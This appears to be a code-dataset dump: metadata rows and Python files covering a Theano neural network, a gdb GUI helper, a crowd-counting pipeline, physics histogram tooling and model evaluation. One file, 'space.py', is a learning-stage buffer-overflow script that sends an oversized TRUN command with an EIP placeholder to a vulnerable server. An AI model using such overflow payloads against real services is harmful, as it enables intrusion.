blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 2
616
| content_id
stringlengths 40
40
| detected_licenses
listlengths 0
69
| license_type
stringclasses 2
values | repo_name
stringlengths 5
118
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringlengths 4
63
| visit_date
timestamp[us] | revision_date
timestamp[us] | committer_date
timestamp[us] | github_id
int64 2.91k
686M
⌀ | star_events_count
int64 0
209k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 23
values | gha_event_created_at
timestamp[us] | gha_created_at
timestamp[us] | gha_language
stringclasses 213
values | src_encoding
stringclasses 30
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 2
10.3M
| extension
stringclasses 246
values | content
stringlengths 2
10.3M
| authors
listlengths 1
1
| author_id
stringlengths 0
212
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
f94c16d5dafa51a22ec02299b323a9e837bbb34f
|
754e748200c84138b023f6d2213ae8046df22803
|
/learn/vlunser/space.py
|
832696601f58ed2def6c6effa911cb5dd3e782be
|
[] |
no_license
|
0xarun/bufferoverflow
|
e344d44742dbb37b06079ed64a0ec58f120f09bc
|
ce2de29786a686163f3e42d91376499b61d3f0f3
|
refs/heads/main
| 2023-02-24T07:12:01.125789
| 2021-01-31T07:52:48
| 2021-01-31T07:52:48
| 334,601,720
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 309
|
py
|
import time, struct, sys
import socket
server = "192.168.225.105"
port = 9999
OFFSET = "A" * 2003
EIP = "BBBB"
SAMPLE = "CCCCC"
space = "D"*1000
req = "TRUN /.:/" + OFFSET + EIP + SAMPLE + space
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((server, port))
print(s.recv(1024))
s.send(req)
|
[
"noreply@github.com"
] |
0xarun.noreply@github.com
|
d5b52e5385b25b282446c84c7f35e12d75acb573
|
327de59d735c9654ef17b3d13a4b63a68d2598c3
|
/model.py
|
fbe3b5f354b251ea1aabf5c8161e11072e029b25
|
[
"Apache-2.0"
] |
permissive
|
jimmycallin/whatelles
|
604ca313be3a98560808569373d33817398be569
|
e8d74888655a6183b2e04b93e421c0f4939f5dbe
|
refs/heads/master
| 2021-01-18T04:38:08.403436
| 2015-09-10T08:47:30
| 2015-09-10T08:47:30
| 33,443,959
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 24,467
|
py
|
import theano
import theano.tensor as T
import numpy as np
class MLP(object):
"""Multi-Layer Perceptron Class
A multilayer perceptron is a feedforward artificial neural network model
that has one layer or more of hidden units and nonlinear activations.
Intermediate layers usually have as activation function tanh or the
sigmoid function (defined here by a ``HiddenLayer`` class) while the
top layer is a softamx layer (defined here by a ``LogisticRegression``
class).
"""
def __init__(self,
rng,
input,
n_hiddens,
n_out,
activation_function,
cost_function,
vocab_size,
embedding_dimensionality,
no_embeddings):
"""Initialize the parameters for the multilayer perceptron
:type rng: numpy.random.RandomState
:param rng: a random number generator used to initialize weights
:type input: theano.tensor.TensorType
:param input: symbolic variable that describes the input of the
architecture (one minibatch)
:type n_hiddens: list[int]
:param n_hidden: list of number of hidden units for each hidden layer
:type n_out: int
:param n_out: number of output units, the dimension of the space in
which the labels lie
"""
embedding_layer = EmbeddingLayer(rng=rng,
input=input,
vocab_size=vocab_size,
embedding_dimensionality=embedding_dimensionality,
no_embeddings=no_embeddings,
embeddings=None,
activation=activation_function)
self.hidden_layers = [embedding_layer]
prev_layer_n = embedding_layer.n_out
prev_input = embedding_layer.output
for n_hidden in n_hiddens:
hidden_layer = HiddenLayer(rng=rng,
input=prev_input,
n_in=prev_layer_n,
n_out=n_hidden,
activation=activation_function)
self.hidden_layers.append(hidden_layer)
prev_layer_n = n_hidden
prev_input = hidden_layer.output
self.log_regression_layer = LogisticRegression(input=self.hidden_layers[-1].output,
n_in=self.hidden_layers[-1].n_out,
n_out=n_out,
cost_function=cost_function)
l1_hidden_layers = sum([abs(hl.W).sum() for hl in self.hidden_layers])
l2_hidden_layers = sum([(hl.W ** 2).sum() for hl in self.hidden_layers])
self.L1 = l1_hidden_layers + abs(self.log_regression_layer.W).sum()
self.L2_sqr = l2_hidden_layers + (self.log_regression_layer.W ** 2).sum()
self.errors = self.log_regression_layer.errors
self.y_pred = self.log_regression_layer.y_pred
self.calculate_cost = self.log_regression_layer.calculate_cost
self.params = [p for hl in self.hidden_layers for p in hl.params] + self.log_regression_layer.params
class EmbeddingLayer():
def __init__(self,
rng,
input,
vocab_size,
embedding_dimensionality,
no_embeddings,
embeddings=None,
activation=T.nnet.sigmoid):
self.input = T.cast(input, 'int32')
self.activation = activation
batch_size = input.shape[0]
self.embedding_dimensionality = embedding_dimensionality
self.no_embeddings = no_embeddings
self.n_out = no_embeddings * embedding_dimensionality
if embeddings is None:
embeddings = np.asarray(rng.uniform(low=-np.sqrt(6 / (vocab_size + embedding_dimensionality)),
high=np.sqrt(6 / (vocab_size + embedding_dimensionality)),
size=(vocab_size, embedding_dimensionality)),
dtype=theano.config.floatX)
if activation == theano.tensor.nnet.sigmoid:
# Sigmoid demands a larger interval, according to [Xavier10].
embeddings *= 4
embeddings = theano.shared(value=embeddings, name='embeddings', borrow=True)
self.embeddings = embeddings
# Replace all word indices in input with word embeddings
emb_input = self.embeddings[self.input.flatten()]
# Reshape to match original input (times embedding dimensionality on columns)
self.W = emb_input.reshape((batch_size, no_embeddings * embedding_dimensionality))
self.output = self.W if self.activation is None else self.activation(self.W)
self.params = [self.embeddings]
class HiddenLayer():
def __init__(self,
rng,
input,
n_in,
n_out,
W=None,
b=None,
activation=T.tanh):
self.input = input
self.activation = activation
self.n_in = n_in
self.n_out = n_out
if W is None:
W_values = np.asarray(rng.uniform(low=-np.sqrt(6 / (n_in + n_out)),
high=np.sqrt(6 / (n_in + n_out)),
size=(n_in, n_out)),
dtype=theano.config.floatX)
if activation == theano.tensor.nnet.sigmoid:
# Sigmoid demands a larger interval, according to [Xavier10].
W_values *= 4
W = theano.shared(value=W_values, name='W', borrow=True)
if b is None:
b_values = np.zeros((n_out,), dtype=theano.config.floatX)
b = theano.shared(value=b_values, name='b', borrow=True)
self.W = W
self.b = b
lin_output = T.dot(input, self.W) + self.b
self.output = (lin_output if self.activation is None else self.activation(lin_output))
self.params = [self.W, self.b]
class LogisticRegression(object):
"""Multi-class Logistic Regression Class
The logistic regression is fully described by a weight matrix :math:`W`
and bias vector :math:`b`. Classification is done by projecting data
points onto a set of hyperplanes, the distance to which is used to
determine a class membership probability.
"""
def __init__(self, input, n_in, n_out, cost_function):
""" Initialize the parameters of the logistic regression
:type input: theano.tensor.TensorType
:param input: symbolic variable that describes the input of the
architecture (one minibatch)
:type n_in: int
:param n_in: number of input units, the dimension of the space in
which the datapoints lie
:type n_out: int
:param n_out: number of output units, the dimension of the space in
which the labels lie
:type: cost_function: function
:param cost_function: Cost function to use.
"""
self.cost_function = cost_function
# initialize with 0 the weights W as a matrix of shape (n_in, n_out)
self.W = theano.shared(value=np.zeros((n_in, n_out),
dtype=theano.config.floatX),
name='W',
borrow=True)
# initialize the baises b as a vector of n_out 0s
self.b = theano.shared(value=np.zeros((n_out,),
dtype=theano.config.floatX),
name='b',
borrow=True)
self.p_y_given_x = T.nnet.softmax(T.dot(input, self.W) + self.b)
self.y_pred = T.argmax(self.p_y_given_x, axis=1)
# parameters of the model
self.params = [self.W, self.b]
def calculate_cost(self, y):
return self.cost_function(self.p_y_given_x, y)
def predicted(self):
return self.y_pred
def errors(self, y):
"""Return a float representing the number of errors in the minibatch
over the total number of examples of the minibatch ; zero one
loss over the size of the minibatch
:type y: theano.tensor.TensorType
:param y: corresponds to a vector that gives for each example the
correct label
"""
# check if y has same dimension of y_pred
if y.ndim != self.y_pred.ndim:
raise TypeError('y should have the same shape as self.y_pred',
('y', y.type, 'y_pred', self.y_pred.type))
# check if y is of the correct datatype
if y.dtype.startswith('int'):
# the T.neq operator returns a vector of 0s and 1s, where 1
# represents a mistake in prediction
return T.mean(T.neq(self.y_pred, y))
else:
raise NotImplementedError("Input of y needs to have dtype int")
class NNPrediction():
model_parameters = {"n_epochs": "Number of epochs for training.",
"seed": "Seed to use for random initialization.",
"learning_rate": "The rate of learning gradient descent.",
"batch_size": "How large batch for each iteration of training.",
"validation_improvement_threshold": "How much the validation test must improve \
within a given before aborting.",
"min_iterations": "Run at least these many iterations without early stopping.",
"activation_function": "Activation function to use.",
"cost_function": "Cost_function to use.",
"embedding_dimensionality": "The dimensionality of each embedding layer.",
"no_embeddings": "Total number of embedding layers.",
"L1_reg": "The L1 regression factor.",
"L2_reg": "The L2 regression factor.",
"classes": "The training output classes.",
"n_hiddens": "List of hidden layers with each layers dimensionality.",
"window_size": "A tuple of number of words to left and right to condition upon.",
"n_tags": "Number of previous POS tags to look for.",
"ignore_pos_tags": "Whether to ignore this feature type or not.",
"ignore_target_context": "Whether to ignore this feature type or not.",
"ignore_source_context": "Whether to ignore this feature type or not."}
def __init__(self, config):
self.config = config
self.x = T.matrix('x')
self.y = T.ivector('y')
self.n_epochs = config.get('n_epochs', 50)
self.rng = np.random.RandomState(self.config.get('seed', 1))
self.learning_rate = self.config.get('learning_rate', 0.01)
self.batch_size = self.config.get('batch_size', 500)
self.validation_improvement_threshold = self.config.get('validation_improvement_threshold', 0.995)
self.min_iterations = self.config.get('min_iterations', 10000)
self.index = T.lscalar()
def _initialize_classifier(self):
self.config['vocab_size'] = self.no_words
self.classifier = MLP(rng=self.rng,
input=self.x,
n_hiddens=self.config['n_hiddens'],
n_out=self.config['n_out'],
activation_function=self.config['activation_function'],
cost_function=self.config['cost_function'],
vocab_size=self.config['vocab_size'],
embedding_dimensionality=self.config['embedding_dimensionality'],
no_embeddings=self.config['no_embeddings'])
self.cost = (self.classifier.calculate_cost(self.y)
+ self.config.get('L1_reg', 0) * self.classifier.L1
+ self.config.get('L2_reg', 0.0001) * self.classifier.L2_sqr)
gparams = [T.grad(self.cost, param) for param in self.classifier.params]
self.updates = [(param, param - self.learning_rate * gparam)
for param, gparam in zip(self.classifier.params, gparams)]
def _initialize_train_model(self, train_set_x, train_set_y):
"""
Initializes the training model.
Params:
:train_set_x: A matrix of features, where each row corresponds to a new training instance.
:train_set_y: A list of corresponding training outputs.
Returns a training model theano function, taking a batch index as input.
"""
shared_x = theano.shared(np.asarray(train_set_x, dtype=theano.config.floatX),
borrow=True)
shared_y = theano.shared(np.asarray(train_set_y, dtype=theano.config.floatX),
borrow=True)
# GPU only handles float32 while the output should actually be int.
shared_y = T.cast(shared_y, 'int32')
batch_interval = slice(self.index * self.batch_size, (self.index + 1) * self.batch_size)
train_model = theano.function(inputs=[self.index],
outputs=self.cost,
updates=self.updates,
givens={self.x: shared_x[batch_interval],
self.y: shared_y[batch_interval]}
)
return train_model
def _initialize_test_model(self, test_set_x):
"""
Initializes the test model.
Params:
:test_set_x: A matrix of features, where each row corresponds to a new instance.
Returns a test model theano function. When calling the function, it runs the test.
The test model outputs a list of predicted classes.
"""
shared_x = theano.shared(np.asarray(test_set_x, dtype=theano.config.floatX),
borrow=True)
# batch_interval = slice(self.index * self.batch_size, (self.index + 1) * self.batch_size)
test_model = theano.function(inputs=[],
outputs=self.classifier.y_pred,
givens={self.x: shared_x})
return test_model
def _initialize_dev_model(self, train_set_x, train_set_y):
"""
Initializes the development model.
Params:
:test_set_x: A matrix of features, where each row corresponds to a new instance.
Returns a dev model theano function. When calling the function, it runs the test.
Output of dev model is the mean error value.
"""
shared_x = theano.shared(np.asarray(train_set_x, dtype=theano.config.floatX),
borrow=True)
shared_y = theano.shared(np.asarray(train_set_y, dtype=theano.config.floatX),
borrow=True)
# GPU only handles float32 while the output should actually be int.
shared_y = T.cast(shared_y, 'int32')
test_model = theano.function(inputs=[],
outputs=self.classifier.errors(self.y),
givens={self.x: shared_x,
self.y: shared_y})
return test_model
def train(self, training_data, validation_data=None):
"""
Trains the classifier given a training set (list of data_utils.Sentence instances).
If given a validation set, validate the improvement of the model every :validation_frequency:th time.
If no improvements have happened for a while, abort the training early.
"""
train_set_x, train_set_y = self.featurify(training_data, update_vocab=True)
self._initialize_classifier()
train_model = self._initialize_train_model(train_set_x, train_set_y)
validation_model = None
if validation_data is not None:
validation_set_x, validation_set_y = self.featurify(validation_data)
validation_model = self._initialize_dev_model(validation_set_x, validation_set_y)
best_error_rate = np.inf
n_train_batches = len(train_set_x) // self.batch_size
epoch = 0
iteration = 0
best_iteration = None
break_early = False
if validation_model is not None:
patience = self.min_iterations
validation_frequency = min(n_train_batches, patience // 2)
else:
patience = self.n_epochs * len(train_set_x)
for epoch in range(self.n_epochs):
if break_early:
break
print("Training epoch {}".format(epoch))
for minibatch_index in range(n_train_batches):
iteration = epoch * n_train_batches + minibatch_index
train_model(minibatch_index)
if validation_model is not None and (iteration + 1) % validation_frequency == 0:
error_rate = self._evaluate(validation_model, self.batch_size, len(validation_set_x))
print("Validation error rate: {}, epoch {}, minibatch {}".format(error_rate,
epoch,
minibatch_index))
if error_rate < best_error_rate:
if error_rate < best_error_rate * self.validation_improvement_threshold:
patience = max(patience, iteration * 2)
best_error_rate = error_rate
best_iteration = iteration
if patience <= iteration:
print("Breaking at iteration {}".format(iteration))
break_early = True
break
print("Finished training model.")
if validation_model is not None:
print("Best validation error rate: {} on iteration {}".format(best_error_rate, best_iteration))
def predict(self, test_data):
test_set_x, test_set_y = self.featurify(test_data)
test_model = self._initialize_test_model(test_set_x)
predictions = self._evaluate(test_model, self.batch_size, len(test_set_x))
return predictions
def _evaluate(self, test_model, batch_size, test_set_length):
return test_model()
def output(self, predictions, output_path):
"""
Outputs the prediction results in a format recognized by the discoMT_scorer.pl.
"""
pred_iter = iter(predictions)
test_instances = []
with open(self.config['development_filepath']) as test_data:
for line in test_data:
(class_labels,
removed_words,
source_sentence,
target_sentence,
alignments) = [x.strip() for x in line.split('\t')]
class_labels = class_labels.split()
removed_words = removed_words.split()
instances_predicted = []
for _ in range(len(class_labels)):
instances_predicted.append(self.classes[next(pred_iter)])
test_instances.append([instances_predicted,
removed_words, source_sentence, target_sentence, alignments])
if output_path is not None:
with open(output_path, 'w') as output:
for line in test_instances:
line_str = ""
for column in line[:2]:
line_str += " ".join(column) + "\t"
line_str += "\t".join(line[2:])
print(line_str)
output.write(line_str + "\n")
class PronounPrediction(NNPrediction):
"""
This is the main model for cross-lingual pronoun prediction.
"""
model_parameters = dict(NNPrediction.model_parameters)
def __init__(self, config):
self._word2id = dict()
self.classes = config['classes']
self.no_words = 0
config['n_out'] = len(self.classes)
self.word2id("UNK", update_vocab=True) # initialize unknown id
super().__init__(config)
def featurify(self, sentences, update_vocab=False):
"""
Param sentences: list of data_utils.Sentence instances
"""
x_matrix = []
y_vector = []
for sentence in sentences:
target_contexts = sentence.removed_words_target_contexts(*self.config['window_size'])
source_contexts = sentence.removed_words_source_contexts(*self.config['window_size'])
sentence_details = zip(sentence.removed_words_source_indices, target_contexts, source_contexts)
for k, (source_indices, target_context, source_context) in enumerate(sentence_details):
features = []
if not self.config.get('ignore_target_context', False):
# Add target context features
for i, context_word in enumerate(target_context):
if i != len(target_context) // 2: # ignore word to replace
features.append(self.word2id(context_word, update_vocab=update_vocab))
if not self.config.get('ignore_source_context', False):
# Add source context features
for context_word in source_context:
if isinstance(context_word, list):
features.append(self.word2id(context_word[0], update_vocab=update_vocab))
else:
features.append(self.word2id(context_word, update_vocab=update_vocab))
if not self.config.get('ignore_pos_tags', False):
# Add n_tags previous nouns
noun_tags = ("NN", "NNS", "NNP", "NNPS", "PRP", "PRP$")
for nouns in sentence.get_previous_target_words_with_tag(source_indices[0],
self.config['n_tags'], tags=noun_tags):
# only add first target noun
features.append(self.word2id(nouns[0]))
# Add n_tags previous articles
article_tags = ("DT",)
for articles in sentence.get_previous_target_words_with_tag(source_indices[0],
self.config['n_tags'],
tags=article_tags):
# only add first target noun
features.append(self.word2id(articles[0]))
x_matrix.append(features)
# only store y values when we actually know them. some test data comes without.
if len(sentence.classes) > 0:
y_vector.append(self.classes.index(sentence.classes[k]))
return np.asarray(x_matrix, dtype=np.int32), np.asarray(y_vector, dtype=np.int32)
def word2id(self, word, update_vocab=False):
"""
Generates and retrieves the index of a given word, used for getting the corresponding embedding.
"""
if word not in self._word2id and update_vocab:
self._word2id[word] = self.no_words
self.no_words += 1
elif word not in self._word2id and not update_vocab:
return self.word2id("UNK", update_vocab=True)
return self._word2id[word]
def negative_log_likelihood(y_pred, y):
return -T.mean(T.log(y_pred)[T.arange(y.shape[0]), y])
def cross_entropy(y_pred, y):
c_entrop = T.sum(T.nnet.categorical_crossentropy(y_pred, y))
return c_entrop
|
[
"jimmy.callin@gmail.com"
] |
jimmy.callin@gmail.com
|
1e273a85868f0f6b461bfd41551779c6a908e717
|
eab72229ae04d1160704cbf90a08a582802a739c
|
/pipeline.py
|
951739aed5ac7ad0818e105dbff2397a48108344
|
[
"MIT"
] |
permissive
|
megatazm/Crowd-Counting
|
444d39b0e3d6e98995f53badf4c073829038b6b7
|
647a055baccee2c3b6b780f38930e2ffd14d1664
|
refs/heads/master
| 2022-04-01T04:49:16.409675
| 2020-01-31T21:24:02
| 2020-01-31T21:24:02
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 518
|
py
|
import os
# Crop area
#os.system("python3 crop.py")
## APPROACH 1 MCNN
os.system("python3 put_zero_image.py")
os.system("python3 test.py")
os.system("python3 put_zero_den.py")
os.system("python3 find_people.py")
os.system("python3 position.py")
## APPROACH 2 - RNN
#os.system("python3 tiny_face_eval.py --weight_file_path weight --prob_thresh 0.04 --nms_thresh 0.0")
## TRACKING
# Put heads into file
#os.system("python3 get_heads.py")
# Track heads among videos
#os.system("python3 track_video.py")
|
[
"gpsunicamp016@gmail.com"
] |
gpsunicamp016@gmail.com
|
0d0b792b12ae89e4345a54d9f5615577cc7c649f
|
9c09818cd7eabfe56c4744ab879f9e460f49add0
|
/gui/adapt.py
|
2210583aac5ee7946f633f9123aabb12def3c1b5
|
[] |
no_license
|
shamjithkv/gdb-gui
|
5498d2041829925917498cb34c22cec1e68deb73
|
b21838a4ea1a68f9d14511f53f4c5c1196478a0c
|
refs/heads/master
| 2020-07-27T22:48:30.282103
| 2017-08-28T16:52:57
| 2017-09-06T12:29:00
| 209,237,135
| 1
| 0
| null | 2019-09-18T06:42:57
| 2019-09-18T06:42:57
| null |
UTF-8
|
Python
| false
| false
| 2,012
|
py
|
# Copyright (C) 2015, 2016 Tom Tromey <tom@tromey.com>
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
# Adapt to gdb issues.
import gdb
import gui.params
# The rule for adding a new entry here is that the bug must have some
# notable user-visible effect.
bugs = {
15620: """Your gdb doesn't have a "new breakpoint" event.
This means that the source windows will not show you where
breakpoints have been set.""",
13598: """Your gdb doesn't have a "before prompt" event.
This means that various windows won't be able to react to
commands like "up" or "down".""",
18385: """Your gdb doesn't expose locations on a gdb.Breakpoint.
This can be worked around, but maybe not always reliably.
This means that sometimes breakpoints won't display in source windows.""",
18620: """Your gdb doesn't have a "breakpoint modified" event.
This means that when a pending breakpoint is resolved, the GUI won't
be able to update to reflect that fact."""
}
_warning = """See https://sourceware.org/bugzilla/show_bug.cgi?id=%s
for more information."""
_first_report = True
def notify_bug(bugno):
if not gui.params.warn_missing.value:
return
if not (bugno in bugs):
return
print("################")
print(bugs[bugno])
print(_warning % bugno)
print("")
print("You can use 'set gui mention-missing off' to disable this message.")
print("################")
del bugs[bugno]
|
[
"tom@tromey.com"
] |
tom@tromey.com
|
7239911c21420bb41edadd6bdde52c22a6ffe90f
|
30eeca4d18bd863260882272cf391b1531dcc871
|
/Limits/test/collectHistos.py
|
5d7c3438171cde65afbc7ca6b8ae0c9b6bdadbf6
|
[] |
no_license
|
decosa/Stat
|
3b1a5dabf563366b8117fbc56ceef338b719ad6e
|
10ba54677f401e574ed803bf739f714c5fd62338
|
refs/heads/master
| 2020-04-28T16:53:55.142130
| 2019-11-26T14:58:29
| 2019-11-26T14:58:29
| 175,427,511
| 0
| 6
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,232
|
py
|
import ROOT
import os, sys
import optparse
import copy
from Stat.Limits.settings import processes, histos
usage = 'usage: %prog -p histosPath -o outputFile'
parser = optparse.OptionParser(usage)
parser.add_option('-i', '--input', dest='path', type='string', default= "./histos2017v6/",help='Where can I find input histos?')
parser.add_option("-o","--outputFile",dest="output",type="string",default="histos_2017.root",help="Name of the output file collecting histos in Combine user frieldy schema. Default is histos.root")
parser.add_option("-s","--stat",dest="mcstat",action='store_true', default=False)
(opt, args) = parser.parse_args()
sys.argv.append('-b')
path_ = opt.path
ofilename = opt.output
mcstat = opt.mcstat
# Creating output file
ofile = ROOT.TFile(ofilename,"RECREATE")
ofile.Close()
# Getting list of files in histos
print os.listdir(path_)
sampFiles = [f for f in os.listdir(path_) if (os.path.isfile(os.path.join(path_, f)) and f.endswith(".root") and f!=ofilename )]
year = ""
if("2016" in path_ or "20161718" in path_): year = "2016"
elif("2017" in path_): year = "2017"
elif("2018" in path_): year = "2018"
#*******************************************************#
# #
# FILLING IN THE INPUT ROOT FILE FOR COMBINE #
# #
#*******************************************************#
histos_data = []
for f in sampFiles:
try:
ifile = ROOT.TFile.Open(path_ + f)
except IOError:
print "Cannot open ", f
else:
print "Opening file ", f
ifile.cd()
samp = f.replace(".root", "")
print "We are looking into file: ", f
ofile = ROOT.TFile(ofilename,"UPDATE")
for k_, h_ in histos.iteritems():
print "We are looking for object ", h_
h = ifile.Get(h_)
if not os.path.isdir( k_+ "_" + year):
newsubdir = ofile.mkdir(k_ + "_" +year)
ofile.cd(k_+ "_" +year)
if(samp.startswith("Data")): samp = "data_obs"
#print "We are looking for histo %s for samp %s in %s" % (h_, samp, f)
h.SetName(samp)
h.Write(samp, ROOT.TObject.kWriteDelete)
if(samp.startswith("Data")): histos_data.append(h)
nBinsX = h.GetNbinsX()
#print "SAMP ",samp
if k_ in samp: samp = samp.replace("_" + k_, "")
elif "cat" in samp: samp = samp.replace("cat_", "")
#print "SAMP after channel removal ",samp
if(samp.startswith("data")): samp = "Data"
# h_ = h_[:4]
if(samp.startswith("SVJ") and not (samp.endswith("Up") or samp.endswith("Down")) and mcstat == True ):
for n in xrange(nBinsX):
hNameUp = "%s_mcstat_%s_bin%d_Up" % ( h_, samp, n+1)
hNameDown = "%s_mcstat_%s_bin%d_Down" % ( h_, samp, n+1)
print "Histogram: ", hNameUp
h_mcStatUp = ifile.Get(hNameUp)
h_mcStatDown = ifile.Get(hNameDown)
h_mcStatUp.SetName("%s_mcstat_%s_%s_%s_bin%dUp" % (samp, k_, year, samp, n+1))
h_mcStatUp.Write("%s_mcstat_%s_%s_%s_bin%dUp" % (samp, k_, year, samp, n+1), ROOT.TObject.kWriteDelete)
h_mcStatDown.SetName("%s_mcstat_%s_%s_%s_bin%dDown" % (samp, k_, year, samp, n+1))
h_mcStatDown.Write("%s_mcstat_%s_%s_%s_bin%dDown" % (samp, k_, year, samp, n+1), ROOT.TObject.kWriteDelete)
ofile.Write()
ofile.Close()
#*******************************************************#
# #
# CREATING TOTAL BACKGORUND HISTOS #
# #
#*******************************************************#
histData = dict(zip(histos.keys(), [None]*len(histos.keys())))
for p in processes:
try:
ifile = ROOT.TFile.Open(path_ + p +".root")
except IOError:
print "Cannot open ", p +".root"
else:
print "Opening file ", p +".root"
ifile.cd()
for k_, h_ in histos.iteritems():
tmphist = ifile.Get( h_)
if histData[k_] is None:
histData[k_] = copy.deepcopy(tmphist)
else: histData[k_].Add(tmphist)
ofile = ROOT.TFile(ofilename,"UPDATE")
for k_ in histos.keys():
print "Creating Bkg histogram "
#if not os.path.isdir( k_ + "_" + year):
# newsubdir = ofile.mkdir(k_+"_" + year)
ofile.cd(k_+ "_" + year)
histData[k_].SetName("Bkg")
histData[k_].Write("Bkg", ROOT.TObject.kWriteDelete)
print "Bkg integral ", histData[k_].Integral()
bkgpdf = histData[k_].Clone("BkgPdf")
bkgpdf.Scale(1./ bkgpdf.Integral())
print "Bkg pdf ", bkgpdf.Integral()
histdata = bkgpdf.Clone("data_obs")
histdata.Reset()
print "data pdf ", histdata.Integral()
histdata.FillRandom(bkgpdf, int(histData[k_].Integral()))
print "data ", histdata.Integral()
#histData[k_].SetName("data_obs")
histdata.Write("data_obs", ROOT.TObject.kWriteDelete)
print "MCSTAT ", mcstat
ofile.Write()
ofile.Close()
|
[
"decosa@t3ui03.psi.ch"
] |
decosa@t3ui03.psi.ch
|
1dce9e2b6a0d7482d47bab26f855b928218015ad
|
ed7f129761f6ef2feaa3808c52bb306522911950
|
/app/main/__init__.py
|
a7fafd9bbdc8a3505fd7bca1b7159365735f55a0
|
[] |
no_license
|
dpvitt/notes
|
de7f55ad782a727cbd684b6b79ca2a4e38cf642d
|
3d7171fdc401a5c38e757b27e2dfee2b857e8939
|
refs/heads/master
| 2020-12-25T11:15:29.331707
| 2016-07-02T21:54:05
| 2016-07-02T21:54:05
| 61,044,112
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 105
|
py
|
from flask import Blueprint
main_route = Blueprint('main_route', __name__)
from . import views, errors
|
[
"daniel@danielpavitt.com"
] |
daniel@danielpavitt.com
|
4a8ada6d088f1323d8cca6167d34a3532ee51e6b
|
be272ddb3de512a7d7f4652ebf94b27052a3e211
|
/code/amalgamtion_with_batch_label.py
|
b8bcd5d4e2bc9975c4f8627b7c1a103c81a390a9
|
[] |
no_license
|
ouc-nlp/KABI
|
d3ba7dd21a008be36e4c46ceeb7f3c8da4da6523
|
f5720a5ef5c61fb5f46d97c0b15de469ef34a564
|
refs/heads/master
| 2023-02-22T18:42:28.521913
| 2021-01-22T10:17:25
| 2021-01-22T10:17:25
| 331,868,769
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,922
|
py
|
import os
import torch
import torch.cuda as tc
from torchvision import transforms
from utils.MyImageFolder import ImagesListFileFolder
from networks.resnet18_for_cifer100 import resnet18
import torch.nn as nn
from utils.AverageMeter import AverageMeter
from networks.rps_net_mlp import RPS_net_mlp
from torchvision import models
import argparse
from utils.Utils import accuracy, get_concat_val_loader
_model_dict = {
'rps_net_mlp': RPS_net_mlp,
'resnet18': resnet18,
'standard_resnet18': models.resnet18
}
_dataset_class_number = {
'mnist':10,
'cifar100':100,
'ilsvrc2012':1000
}
"""
the accurcy of amalgamation models with batch labels
"""
def get_parser():
parser = argparse.ArgumentParser()
parser.add_argument("--data_root", type=str, default='../datasets_folder')
parser.add_argument("--model_root", type=str, default='../model')
parser.add_argument("--dataset_name", type=str, default='cifar100')
parser.add_argument("--batch_size", type=int, default=64)
parser.add_argument("--model", type=str, default='resnet18')
parser.add_argument("--gpu_id", type=str, default='0')
parser.add_argument("--start", type=int, default=1)
parser.add_argument("--end", type=int, default=10)
parser.add_argument("--phases", type=int, default=10)
return parser
def main():
opts = get_parser().parse_args()
models_folder=os.path.join(opts.model_root,opts.dataset_name,str(opts.phases)+'phases','amalgamation_models')
model_file_name_list=os.listdir(models_folder)
for model_file_name in model_file_name_list:
model_path=os.path.join(models_folder,model_file_name)
model = _model_dict[opts.model]()
state = torch.load(model_path, map_location=lambda storage, loc: storage)
num_cls = state['num_classes']
model.fc = nn.Linear(model.fc.in_features, num_cls)
model.load_state_dict(state['state_dict'])
model.cuda()
model.eval()
val_file_path_list = []
val_dataset_folder = os.path.join(opts.data_root,opts.dataset_name,str(opts.phases)+'phases','separated/test/batch_test')
val_dataset_filename_list = os.listdir(val_dataset_folder)
for val_dataset_filename in val_dataset_filename_list[:int(model_file_name[-2:])]:
val_file_path = os.path.join(val_dataset_folder,val_dataset_filename)
val_file_path_list.append(val_file_path)
val_loader = get_concat_val_loader(val_file_path_list,opts.dataset_name,val_dataset_folder, opts.batch_size)
top = AverageMeter()
class_num_each_phase = _dataset_class_number[opts.dataset_name] // opts.phases
for data in val_loader:
inputs, labels = data
if tc.is_available():
inputs, labels = inputs.cuda(0), labels.cuda(0)
outputs = model(inputs)
output_output = outputs
for label_index in range(len(outputs)):
min_value = torch.min(outputs[label_index])
for phase in range(opts.phases):
if class_num_each_phase * phase <= labels[label_index] < class_num_each_phase * (phase + 1):
outputs[label_index][:class_num_each_phase * phase] = min_value - 1
outputs[label_index][class_num_each_phase * (phase + 1):] = min_value - 1
if opts.dataset_name == 'ilsvrc2012':
# compute top-5 classification accuracy for ilsvrc 2012
_, prec = accuracy(outputs.data, labels, topk=(1, 5))
else:
# compute top-1 classification accuracy for cifar100 and mnist
prec, _ = accuracy(outputs.data, labels, topk=(1, 2))
top.update(prec.item(), inputs.size(0)) # inputs.size(0) = batch_size
print(top.avg)
if __name__ == '__main__':
main()
|
[
"xwh@ouc.edu.cn"
] |
xwh@ouc.edu.cn
|
934e6966fbd17ae8a420204911909a52151bbaf6
|
8d5f49fa1fda8ffc473e7f5a62786c77838a5820
|
/website/load_tests/drawquest/test_scripts/utils.py
|
e305eef730b14c15bd7911f0cf1ade88885204ff
|
[
"BSD-3-Clause"
] |
permissive
|
MichaelBechHansen/drawquest-web
|
dfc6f5d9541860a5df23db678e82564a230bd42e
|
8d8f9149b6efeb65202809a5f8916386f58a1b3b
|
refs/heads/master
